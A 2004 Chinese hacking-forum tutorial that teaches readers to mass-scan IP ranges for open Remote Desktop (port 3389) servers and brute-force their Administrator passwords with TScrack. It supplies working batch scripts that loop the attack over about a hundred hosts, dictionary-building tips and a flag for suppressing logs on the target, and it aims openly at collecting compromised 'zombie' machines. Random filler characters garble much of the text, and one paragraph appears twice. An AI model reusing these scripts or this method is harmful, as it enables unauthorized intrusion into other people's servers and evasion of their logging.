|
作者:霜风 QQ:14226581
/ e. Q* J! V) v/ j终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。( M' W" }/ Z. k6 D; ?) B1 w
这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下:
+ s9 ^- b$ U1 F首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:
) c# R' V$ i8 G" T9 p先打开superscan3如图1
$ z7 r% D# Z. w% y# C2 ?
/ Y. G3 V+ b9 z3 d2 L6 t此主题相关图片如下:
$ h7 C# s$ Z1 b6 L a) c: I! z
! `) m2 c! ~% ]) F% w. q2 a2 z3 }; Q2 b6 D( c
接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2
. W/ d P1 w6 ^- x/ J- n$ l1 d' V6 z& }2 |- w k
此主题相关图片如下:! O, s5 T, C9 P3 m# p9 |
! d" K7 w) D# h( A% m
0 S3 `" X( Y/ @! ^7 y" |0 {+ d
然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除." d" V5 l: [0 F% K3 Y6 Q( G: L
这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3& P/ j, p: D; M. Q% D6 {
6 m u2 I+ S. W$ ]此主题相关图片如下:
; Q# P: j) s, s0 d, I
( g" g: r9 J. K7 n% x
) @+ _" g: ` m9 O# N) z“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。
5 q! [* Q# e2 Q: w1 R1 x6 S# l" Z: ^- l7 h" w5 K) H, U
此主题相关图片如下:
" ^7 D- _ A3 a2 [ ! F2 j" E: q. y* a# ` ]2 k1 j
接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5
9 u7 a X3 A9 D6 l/ `' I$ x& ?, H$ C) t+ @' W
此主题相关图片如下:; f6 e2 F% |3 e% W5 ?
" I# p, Q5 |" _2 G. T
进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。
, h+ ^# _7 m3 L/ a+ a所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。" u, V* n) \$ o, U9 B1 r: L3 G
TScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。
# i5 ]1 e1 ^- s P此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。
4 t" f$ N$ l* C3 a; f. z在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:* l5 z) I5 I9 ]+ R+ \' V- ~1 {1 Z
-h : Print usage help and exit% x( ?2 o/ _5 [$ @" Q0 G9 \
-V : Print version info and exit6 a0 S5 k. |) S2 ?3 b' x! E3 d
-s : Print chipher strenght info and exit& J; ^, c( B+ Z1 S
-b : Enable failed password beep. Z4 i+ \+ a6 k, _$ {# A5 v d
-t : Use two simultaneous connections [EXPERIMENTAL]) R/ [3 p4 Q, Y' w! r2 [
-N : Prevent System Log entries on targeted server
4 E0 d4 b$ n2 f% {1 h2 E-U : Uninstall tscrack and remove components, ]9 T3 @ g, \
-f <number> : Wordlist entry to start cracking with
2 w8 \' ~8 Z& f( U: X-F <delay> : Sampling Frequency (Delay between samples in ms)
( ~! |3 w8 x9 n; T-l <user> : Account name to use, defaults to Administrator) @9 t9 P" r. t" R/ Q( v, f
-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted
7 B$ d* v1 F2 @7 V! T$ _" W-p <password> : Use <password> to logon instead of wordlist/blank pass2 _- X* n3 K& N
-D <domain> : Specify domain to attempt logon to 2 p# c, r _% _; h9 z, i) D
# \3 s! s* c$ c4 ?" W. j/ n3 f
3 u5 F4 }! Q9 G4 }+ k& L- f我就帮忙翻译一下吧,翻译得不好可不要怪我啊:+ U6 x2 Q6 ?" U3 U
-h : 显示使用帮助然后退出$ L5 b5 x' q& m) J+ t0 j
-V : 显示版本信息然后退出
4 R) G/ ^( c3 @& K. S3 t5 @ \+ A-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明), [9 ]6 A# y5 P6 {5 c' t% k
-b : 密码错误时发出声音
- ^2 ~+ \8 ]4 p( e% j3 w0 ]. d-t : 同时发出多个连接,就是多线程。
8 F5 G) f$ _; o0 k3 u! \-N : Prevent System Log entries on targeted server( \9 I4 n$ m2 Q8 ?& t. ]2 G, C6 `( p
-U : 卸载移除tscrack组件。
( c3 I4 H6 [3 I9 \! N, ^-f <number> : 使用-F后面的密码。
0 B9 l d1 U9 _" `7 f. [/ S-F <delay> : 间隔时间(频率)
+ {& o; R0 E; p# L+ G& \, v6 Q-l <user> : 使用-L后面的用户名% `5 I: t4 H9 q
-w <wordlist> : 使用-W后面的字典( ^/ ]% \ t1 h
-p <password> : 使用-W后的密码
/ k1 _2 d# J4 @-D <domain> : 登陆主页面?
" u$ C7 O. F) E8 |) a [相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:
" J$ }' Y+ y+ G) _- g@if not exist IpcScan.txt goto noscan f/ E: `% I- v0 F6 q
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
% z% E9 V6 Y6 Q:noscan
. J9 Q; o4 y' y+ O: `+ w@echo 3389.txt no find or scan faild 
6 }4 S' l& Y8 f: z, {这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)
; m5 D& s8 T+ L+ Z5 ]! Y& J保存后把后错名改为BAT就可以了。0 g" z6 k( E O5 m: X9 N$ ~
还写一个BAT,名字为HACK.BAT,代码如下:
1 A' H, i- I& i@if not exist tscrack.exe goto noscan
, }7 Y& H9 J# X. E6 N4 O) D@tscrack %1 -l administartor -w pass.dic >>rouji.txt# B1 n! O8 h6 w' C5 `
:noscan1 \2 Q# W7 T) _* u, g
@echo tscrack.exe no find or scan faild
. X& ]4 l N+ z0 |) |这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC' d3 f6 ?1 o/ i& z
制作方法如上。
2 h/ G1 l, {: V; Y( E; {+ H然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6
- |! e( n/ d9 O2 V, @3 |" D" D3 _4 p: |1 d: S# |
此主题相关图片如下:! K0 z. Q+ N! h _9 n! A
怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.1 p4 I. N+ t$ c+ g% `
最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7/ w1 n0 W3 L g5 u
0 h6 A( ~9 K: K( B2 }. Q2 P
此主题相关图片如下:: S% s* R- m7 o" n* Q
% q: h- e7 Q% I怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
. K# I8 ~ j9 j; {0 h最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ | 
IP卡
狗仔卡
发表于 2004-10-6 09:51
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
